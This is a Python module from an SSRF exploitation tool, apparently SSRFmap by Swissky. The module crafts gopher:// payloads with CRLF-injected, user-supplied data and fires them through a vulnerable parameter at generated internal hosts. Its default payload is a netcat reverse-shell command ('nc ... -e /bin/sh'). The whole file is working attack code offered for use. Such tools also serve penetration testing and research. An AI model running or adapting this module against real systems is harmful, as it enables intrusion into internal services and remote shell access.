30 lines
1.0 KiB
Python
30 lines
1.0 KiB
Python
from core.utils import *
|
|
import urllib.parse
|
|
import logging
|
|
|
|
name = "custom"
|
|
description = "Send custom data to a listening service, e.g: netcat"
|
|
author = "Swissky"
|
|
documentation = []
|
|
|
|
class exploit():
|
|
SERVICE_IP = "127.0.0.1"
|
|
SERVICE_PORT = "8080"
|
|
SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &"
|
|
|
|
def __init__(self, requester, args):
|
|
logging.info(f"Module '{name}' launched !")
|
|
gen_hosts = gen_ip_list("127.0.0.1", args.level)
|
|
self.SERVICE_PORT = input("Service Port: ")
|
|
self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
|
|
|
for gen_host in gen_hosts:
|
|
payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
|
|
|
|
if args.verbose == True:
|
|
logging.info(f"Generated payload : {payload}")
|
|
|
|
r = requester.do_request(args.param, payload)
|
|
|
|
if args.verbose == True:
|
|
logging.info(f"Module '{name}' ended !") |